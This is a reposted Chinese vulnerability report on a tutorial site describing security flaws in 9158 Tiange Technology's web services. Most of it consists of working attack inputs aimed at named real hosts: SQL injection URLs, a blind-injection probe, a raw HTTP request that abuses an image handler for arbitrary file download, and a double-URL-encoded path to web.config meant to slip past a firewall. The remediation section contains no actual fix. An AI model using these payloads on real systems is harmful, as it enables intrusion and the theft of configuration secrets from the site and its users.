来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 9158天格科技(杭州)的一些安全问题,多处SQL注射,任意文件下载与防火墙绕过。详细说明:1、注入1http://ok.9158.com/musiclist.aspx?musictype=1searchType=1#39;,1,1--searchKey=http://ok.9158.com/musi......
|
9158天格科技(杭州)的一些安全问题,多处SQL注射,任意文件下载与防火墙绕过。
详细说明:
1、注入1
http://ok.9158.com/musiclist.aspx?musictype=1&searchType=1',1,1--&searchKey=
http://ok.9158.com/musiclist.aspx?musictype=1&searchType=1',1,1;select--&searchKey=
2、注入2
http://ok.9158.com/musiclist.aspx?musictype=1&searchType=1&searchKey=%E5%AD%99%E4%BF%AA'
http://ok.9158.com/musiclist.aspx?musictype=1&searchType=1&searchKey=%E5%AD%99%E4%BF%AA%27,1,1,1--
注入同上,直接多句执行
3、盲注
http://room.9158.com/ktv_new/in_ktvroom.aspx?serverid=66&userid=wangjing01' and 1=1 and ''='
这个盲注可以自己判断,输入正确的语句和错误的语句。。
4、同分站任意文件下载
GET /UserControls/GetImage.ashx?ImgUrl=~/UserControls/GetImage.ashx HTTP/1.1
Host: cssr.9158.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Connection: keep-alive
Cookie: Cache=vod
使用 NC 提交
看下图(虽然有防火墙,但可以二次编码绕过)
如:
~/web.config
二次编码后:
%25%37%45%25%32%46%25%37%37%25%36%35%25%36%32%25%32%45%25%36%33%25%36%46%25%36%45%25%36%36%25%36%39%25%36%37
   修复方案:
应该懂得!
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
